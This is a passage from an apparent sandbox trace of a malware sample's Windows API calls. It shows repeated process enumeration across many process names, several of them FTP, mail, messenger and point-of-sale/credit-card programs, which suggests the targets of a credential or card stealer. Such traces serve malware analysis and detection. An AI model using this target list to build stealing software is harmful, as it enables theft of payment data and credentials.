cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0239.513] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.515] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.517] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0239.522] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.524] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.525] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0239.529] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0239.532] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0239.533] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0239.535] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0239.537] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0239.540] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0239.541] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0239.543] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0239.545] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0239.546] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0239.548] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0239.550] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0239.551] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0239.553] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0239.555] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0239.556] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0239.560] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0239.562] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0239.564] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0239.566] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0239.573] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0239.574] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0239.577] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0239.579] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0239.581] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0239.583] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0239.585] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0239.587] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0239.589] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0239.592] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0239.594] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0239.596] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0239.598] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0239.600] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0239.604] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0239.606] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0239.608] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0239.610] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0239.613] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0239.615] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0239.617] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0239.620] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0239.622] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0239.624] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0239.626] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0239.628] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0239.630] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0239.632] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0239.634] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0239.637] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0239.643] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0239.645] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0239.649] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0239.651] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0239.653] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0239.655] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0239.658] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0239.660] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0239.664] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0239.666] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0239.668] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0239.671] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0239.673] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0239.674] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0239.676] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0239.680] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0239.682] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0239.684] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0239.686] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0239.687] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0239.690] CloseHandle (hObject=0x2280) returned 1 [0239.690] Sleep (dwMilliseconds=0x64) [0239.805] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22c8 [0239.822] Process32First (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.825] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0239.827] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0239.829] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.832] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0239.835] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.837] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0239.841] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, 